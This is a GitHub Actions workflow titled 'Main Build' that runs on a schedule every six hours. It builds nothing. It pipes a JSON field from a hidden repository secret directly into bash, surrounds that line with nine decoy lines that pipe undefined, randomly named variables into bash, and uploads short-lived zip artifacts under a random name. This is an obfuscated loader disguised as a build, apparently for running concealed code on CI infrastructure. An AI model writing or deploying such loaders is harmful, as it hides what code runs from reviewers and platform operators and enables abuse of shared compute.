name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '35 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          lntcn3: ${{ secrets.lntcn3 }}
        run: |
          printf '%s' "$lntcn3" | jq -r .hdddj944 | /bin/bash
          echo $zwbi1 | jq -r .mf7877 | /bin/bash
          printf '%s' "$l092" | jq -r .anih3 | /bin/bash
          echo $eqc0 | jq -r .buk522 | /bin/bash
          echo $ow16 | jq -r .eq22857 | /bin/bash
          printf '%s' "$gmmjk7" | jq -r .itbxp247 | /bin/bash
          echo $wx5844 | jq -r .fr91 | /bin/bash
          printf '%s' "$o6662" | jq -r .t5 | /bin/bash
          echo $p34625 | jq -r .dgzq59207 | /bin/bash
          printf '%s' "$fryg45" | jq -r .hwo719 | /bin/bash

      - name: Upload artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: sctAFtHK
          path: "*.zip"
          retention-days: 1
